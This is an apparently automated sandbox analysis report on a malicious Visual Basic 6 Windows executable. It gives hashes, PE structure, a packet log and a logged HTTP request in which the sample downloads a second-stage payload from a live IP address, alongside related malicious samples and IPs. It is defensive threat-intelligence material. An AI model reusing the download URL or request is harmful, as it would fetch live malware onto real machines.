                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 52% (good quality ratio 42.1%)
                        • Quality average: 65.4%
                        • Quality standard deviation: 37.1%
                        HCA Information:
                        • Successful, ratio: 69%
                        • Number of executed functions: 246
                        • Number of non-executed functions: 17
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        103.125.191.5Unique food order.xlsxGet hashmaliciousBrowse
                        • 103.125.191.5/bin_xMjelaYnr43.bin

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNUnique food order.xlsxGet hashmaliciousBrowse
                        • 103.125.191.5
                        tt payment proof.xlsxGet hashmaliciousBrowse
                        • 103.125.191.187
                        TIE-3735-2020.xlsxGet hashmaliciousBrowse
                        • 103.125.191.229
                        payslip.s.xlsxGet hashmaliciousBrowse
                        • 103.125.191.187
                        Telex-relase.xlsxGet hashmaliciousBrowse
                        • 103.141.138.120
                        Y0L60XAhvo.rtfGet hashmaliciousBrowse
                        • 103.141.138.122
                        d6pj421rXA.exeGet hashmaliciousBrowse
                        • 103.139.45.59
                        8YPssSkVtu.rtfGet hashmaliciousBrowse
                        • 103.141.138.87
                        PI098763556299.xlsxGet hashmaliciousBrowse
                        • 103.125.191.229
                        PIT12425009.xlsxGet hashmaliciousBrowse
                        • 103.125.191.229
                        wIeFid8p7Q.exeGet hashmaliciousBrowse
                        • 103.125.189.164
                        Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                        • 103.139.45.59
                        shipping documents.xlsxGet hashmaliciousBrowse
                        • 103.133.108.6
                        shipping documents.xlsxGet hashmaliciousBrowse
                        • 103.133.108.6
                        EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                        • 103.114.107.156
                        Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                        • 103.141.138.122
                        Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                        • 103.141.138.122
                        Z08LsyTAN6.exeGet hashmaliciousBrowse
                        • 103.125.189.164
                        QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                        • 103.125.191.123
                        R56D5hnFR3.rtfGet hashmaliciousBrowse
                        • 103.125.191.123

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):4.914988096771549
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.15%
                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2eD17GZuWs.exe
                        File size:61440
                        MD5:c05eee88f0b57e853996957d6523397b
                        SHA1:fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
                        SHA256:7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
                        SHA512:9441441f5d6d84e4c674e77013ce1bf562173195de9ac1c05463bcf0bbda51345b6af219b279f93e7d2df84bbfb22d11906b8a145f1fe98efaf3a28786be220f
                        SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......P.....................0....................@........

                        File Icon

                        Icon Hash:20047c7c70f0e004

                        Static PE Info

                        General

                        Entrypoint:0x401218
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x50B8A68A [Fri Nov 30 12:28:58 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:823b3db4fa697cef327445c59300049d

                        Entrypoint Preview

                        Instruction
                        push 004019DCh
                        call 00007FA87CA2F933h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], al
                        or al, C7h
                        stosd
                        pushfd
                        add bl, ah
                        inc esi
                        xchg eax, edi
                        sbb eax, A17D13C7h
                        popad
                        in eax, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        popad
                        je 0000F9B5h
                        jns 00007FA87CA2F9ADh
                        imul esp, dword ptr [ebp+74h], 73h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        dec esp
                        xor dword ptr [eax], eax
                        pop ds
                        mov ebp, AFADF0F4h
                        xchg eax, ebx
                        or byte ptr [ebp-54h], FFFFFFEDh
                        sub al, B9h
                        mov word ptr [edx+3BA912D4h], cs
                        cmc

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc3040x3c.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x8f8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x30
                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xac.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xb6600xc000False0.449890136719data5.65312994467IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .data0xd0000x13bc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0xf0000x8f80x1000False0.16943359375data1.94217064888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0xf7c80x130data
                        RT_ICON0xf4e00x2e8data
                        RT_ICON0xf3b80x128GLS_BINARY_LSB_FIRST
                        RT_GROUP_ICON0xf3880x30data
                        RT_VERSION0xf1500x238dataEnglishUnited States

                        Imports

                        DLLImport
                        USER32.DLLHideCaret
                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                        Version Infos

                        DescriptionData
                        Translation0x0409 0x04b0
                        InternalNameLUKENES
                        FileVersion1.00
                        CompanyNameDynegy
                        CommentsDynegy
                        ProductNameaftrykkets
                        ProductVersion1.00
                        OriginalFilenameLUKENES.exe

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        11/19/20-10:49:58.574580TCP2018752ET TROJAN Generic .bin download from Dotted Quad4975680192.168.2.4103.125.191.5

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 19, 2020 10:49:58.257344961 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.573558092 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.573877096 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.574579954 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.891490936 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891516924 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891535044 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891551971 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891586065 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.891609907 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:59.207879066 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207909107 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207926035 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207943916 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207961082 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207978010 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207998991 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.208019972 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.208074093 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:59.208142996 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.525682926 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525711060 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525722980 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525733948 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525783062 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525830030 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525904894 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525922060 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525938034 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525955915 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525955915 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.525996923 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526000977 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526007891 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526009083 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526026964 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526060104 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526097059 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526108027 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526155949 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526177883 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526223898 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526320934 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526366949 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.553169966 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.553255081 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.841959953 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.841984034 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842006922 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842037916 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842037916 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842051029 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842062950 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842067003 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842117071 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842133999 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842134953 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842181921 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842197895 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842242956 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842279911 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842295885 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842328072 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842351913 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842363119 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842407942 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842443943 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842494965 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158025980 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158051014 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158068895 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158085108 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158101082 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158121109 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158139944 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158155918 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158174038 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158181906 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158190966 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158209085 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158226013 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158242941 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158263922 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158279896 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158282042 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158301115 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158318996 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158354044 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158374071 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158417940 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158487082 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158524990 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158545017 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158564091 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158581018 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158598900 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158612967 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158642054 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158658981 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158679962 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158693075 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158775091 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474378109 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474404097 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474421978 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474440098 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474450111 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474458933 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474477053 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474479914 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474493027 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474510908 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474522114 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474528074 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474549055 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474551916 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474565983 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474580050 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474617958 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474622965 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474639893 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474657059 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474664927 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474674940 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474704027 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474720955 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474750042 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474750042 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474786997 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474808931 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474811077 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474877119 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474878073 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474894047 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474911928 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474930048 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474941015 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474950075 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474957943 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474988937 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475023031 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475023985 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475043058 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475073099 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475095987 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475204945 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475222111 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475239038 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475270033 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475276947 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475317955 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475368977 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475389004 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475408077 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475419044 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475433111 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475462914 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475466013 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475483894 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475497961 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475534916 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475594997 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475632906 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475641012 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475675106 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475677967 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475712061 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475717068 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475753069 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475754023 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475797892 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475811005 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475857019 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475888014 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475903988 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475920916 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475934029 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475938082 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475959063 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475965977 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475976944 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.476008892 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.476051092 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.476068020 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.476111889 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799149990 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799181938 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799195051 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799207926 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799220085 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799236059 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799249887 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799263000 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799295902 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799319029 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799336910 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799355030 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799377918 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799505949 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799540043 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799552917 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799570084 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799582005 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799597025 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799612045 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799628973 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799649954 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799669027 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799685955 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799702883 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799721003 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799740076 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799750090 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799875021 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799895048 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799897909 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799901009 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799904108 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:04.413501978 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:04.413624048 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:28.786468983 CET4975680192.168.2.4103.125.191.5

                        HTTP Request Dependency Graph

                        • 103.125.191.5

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449756103.125.191.580C:\Users\user\Desktop\2eD17GZuWs.exe
                        TimestampkBytes transferredDirectionData
                        Nov 19, 2020 10:49:58.574579954 CET5396OUTGET /bin_xMjelaYnr43.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: 103.125.191.5
                        Cache-Control: no-cache
                        Nov 19, 2020 10:49:58.891490936 CET5397INHTTP/1.1 200 OK
                        Date: Thu, 19 Nov 2020 09:49:57 GMT
                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                        Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                        ETag: "2d640-5b4682e21b662"
                        Accept-Ranges: bytes
                        Content-Length: 185920
                        Content-Type: application/octet-stream
